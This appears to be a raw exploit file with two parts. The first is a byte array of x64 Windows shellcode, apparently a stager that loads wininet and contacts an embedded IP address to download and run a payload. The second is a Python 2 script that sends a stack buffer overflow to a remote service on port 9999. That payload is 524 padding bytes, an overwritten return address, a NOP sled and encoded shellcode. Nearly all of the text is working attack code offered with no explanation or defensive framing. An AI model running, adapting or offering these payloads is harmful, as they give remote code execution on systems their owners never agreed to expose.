$buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x0,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,0x7,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0xe,0x0,0x0,0x0,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x35,0x2e,0x31,0x31,0x0,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xbb,0x1,0x0,0x0,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x3,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0xd2,0x0,0x0,0x0,0x2f,0x35,0x5f,0x5f,0x32,0x34,0x49,0x50,0x41,0x6b,0x70,0x72,0x35,0x77,0x76,0x6a,0x41,0x6f,0x75,0x62,0x72,0x54,0x67,0x41,0x61,0x64,0x46,0x4a,0x62,0x46,0x63,0x50,0x58,0x4d,0x5f,0x6c,0x44,0x31,0x70,0x31,0x70,0x32,0x34,0x5a,0x4d,0x52,0x71,0x74,0x6a,0x59,0x42,0x75,0x64,0x33,0x70,0x53,0x69,0x59,0x47,0x36,0x5f,0x63,0x66,0x31,0x79,0x52,0x51,0x33,0x4a,0x75,0x57,0x56,0x32,0x79,0x63,0x6b,0x56,0x4a,0x6a,0x53,0x72,0x4f,0x33,0x41,0x58,0x37,0x38,0x37,0x50,0x63,0x5f,0x74,0x78,0x6a,0x56,0x4e,0x32,0x41,0x75,0x61,0x49,0x42,0x43,0x57,0x69,0x52,0x45,0x74,0x54,0x6b,0x31,0x47,0x67,0x6d,0x56,0x62,0x39,0x6f,0x6f,0x2d,0x4b,0x5a,0x75,0x74,0x46,0x51,0x57,0x70,0x6d,0x48,0x76,0x6a,0x59,0x61,0x52,0x66,0x61,0x78,0x6f,0x53,0x79,0x66,0x38,0x37,0x39,0x52,0x4a,0x6c,0x37,0x64,0x71,0x6c,0x6e,0x44,0x75,0x56,0x48,0x37,0x44,0x77,0x53,0x48,0x70,0x61,0x44,0x69,0x6d,0x38,0x31,0x4e,0x47,0x71,0x4d,0x77,0x66,0x33,0x77,0x72,0x4d,0x44,0x54,0x4a,0x6b,0x73,0x69,0x6e,0x7a,0x63,0x49,0x6e,0x71,0x41,0x71,0x4e,0x37,0x41,0x4a,0x65,0x73,0x55,0x4b,0x53,0x4d,0x38,0x4e,0x6c,0x7a,0x4c,0x4a,0x0,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x0,0x32,0xa0,0x84,0x0,0x0,0x0,0x0,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0xa,0x5f,0x48,0x89,0xf1,0x6a,0x1f,0x5a,0x52,0x68,0x80,0x33,0x0,0x0,0x49,0x89,0xe0,0x6a,0x4,0x41,0x59,0x49,0xba,0x75,0x46,0x9e,0x86,0x0,0x0,0x0,0x0,0xff,0xd5,0x4d,0x31,0xc0,0x53,0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,0x0,0x0,0x49,0xba,0x44,0xf0,0x35,0xe0,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0xff,0xcf,0x74,0x2,0xeb,0xaa,0xe8,0x55,0x0,0x0,0x0,0x53,0x59,0x6a,0x40,0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x0,0x10,0x0,0x0,0x49,0xba,0x58,0xa4,0x53,0xe5,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x0,0x20,0x0,0x0,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x7,0x48,0x1,0xc3,0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x0,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5
#!/usr/bin/env python
#-*- coding: utf-8 -*-
import socket
overflow = "A" * 524
eip = "\x1B\x21\x73\x75" 
buf =  ""
buf += "\xdb\xcb\xba\xbd\x1f\x34\x40\xd9\x74\x24\xf4\x5e\x2b"
buf += "\xc9\xb1\x56\x31\x56\x18\x03\x56\x18\x83\xee\x41\xfd"
buf += "\xc1\xbc\x51\x80\x2a\x3d\xa1\xe5\xa3\xd8\x90\x25\xd7"
buf += "\xa9\x82\x95\x93\xfc\x2e\x5d\xf1\x14\xa5\x13\xde\x1b"
buf += "\x0e\x99\x38\x15\x8f\xb2\x79\x34\x13\xc9\xad\x96\x2a"
buf += "\x02\xa0\xd7\x6b\x7f\x49\x85\x24\x0b\xfc\x3a\x41\x41"
buf += "\x3d\xb0\x19\x47\x45\x25\xe9\x66\x64\xf8\x62\x31\xa6"
buf += "\xfa\xa7\x49\xef\xe4\xa4\x74\xb9\x9f\x1e\x02\x38\x76"
buf += "\x6f\xeb\x97\xb7\x40\x1e\xe9\xf0\x66\xc1\x9c\x08\x95"
buf += "\x7c\xa7\xce\xe4\x5a\x22\xd5\x4e\x28\x94\x31\x6f\xfd"
buf += "\x43\xb1\x63\x4a\x07\x9d\x67\x4d\xc4\x95\x93\xc6\xeb"
buf += "\x79\x12\x9c\xcf\x5d\x7f\x46\x71\xc7\x25\x29\x8e\x17"
buf += "\x86\x96\x2a\x53\x2a\xc2\x46\x3e\x22\x27\x6b\xc1\xb2"
buf += "\x2f\xfc\xb2\x80\xf0\x56\x5d\xa8\x79\x71\x9a\xb9\x6e"
buf += "\x82\x74\x01\xfe\x7c\x75\x71\xd6\xba\x21\x21\x40\x6a"
buf += "\x4a\xaa\x90\x93\x9f\x46\x9b\x03\xe0\x3e\x94\xd9\x88"
buf += "\x3c\xab\xdc\xf3\xc9\x4d\x8e\x53\x99\xc1\x6f\x04\x59"
buf += "\xb2\x07\x4e\x56\xed\x38\x71\xbd\x86\xd3\x9e\x6b\xfe"
buf += "\x4b\x06\x36\x74\xed\xc7\xed\xf0\x2d\x43\x07\x04\xe3"
buf += "\xa4\x62\x16\x14\xd3\x8c\xe6\xe5\x76\x8c\x8c\xe1\xd0"
buf += "\xdb\x38\xe8\x05\x2b\xe7\x13\x60\x28\xe0\xec\xf5\x18"
buf += "\x9a\xdb\x63\x24\xf4\x23\x64\xa4\x04\x72\xee\xa4\x6c"
buf += "\x22\x4a\xf7\x89\x2d\x47\x64\x02\xb8\x68\xdc\xf6\x6b"
buf += "\x01\xe2\x21\x5b\x8e\x1d\x04\xdf\xc9\xe1\xda\xc8\x71"
buf += "\x89\x24\x49\x82\x49\x4f\x49\xd2\x21\x84\x66\xdd\x81"
buf += "\x65\xad\xb6\x89\xec\x20\x74\x28\xf0\x68\xd8\xf4\xf1"
buf += "\x9f\xc1\x07\x8b\xd0\xf6\xe8\x6c\xf9\x92\xe9\x6c\x05"
buf += "\xa5\xd6\xba\x3c\xd3\x19\x7f\x7b\xec\x2c\x22\x2a\x67"
buf += "\x4e\x70\x2c\xa2"
print "[+] Iniciado "
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("IPREMOTO",9999))
resp = sock.recv(1024)
print "[+] Conectado"
sock.sendall(overflow + eip + "\x90" * 15 + buf)
sock.close()
print "[+] BUFFEROVERFLOW"
